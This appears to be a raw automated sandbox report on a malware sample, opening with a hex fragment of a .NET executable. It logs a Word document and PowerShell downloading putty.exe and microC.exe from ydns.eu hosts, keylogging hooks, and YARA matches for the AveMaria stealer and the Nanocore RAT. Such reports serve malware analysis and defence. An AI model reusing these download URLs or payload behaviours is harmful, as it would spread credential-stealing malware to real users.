00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: newhosteeeee.ydns.eu
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/p
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putt
        Source: powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exePE
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://ja.com/
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://java.co
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu
        Source: powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: putty.exe, 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, putty.exe, 0000000B.00000002.2117025453.0000000000102000.00000020.00020000.sdmpString found in binary or memory: https://antizapret.prostovpn.org/domains-export.txt.GDPI
        Source: putty.exe, images.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Installs a global keyboard hookShow sources
        Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,13_2_0040813A
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

        E-Banking Fraud:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,13_2_00413695

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
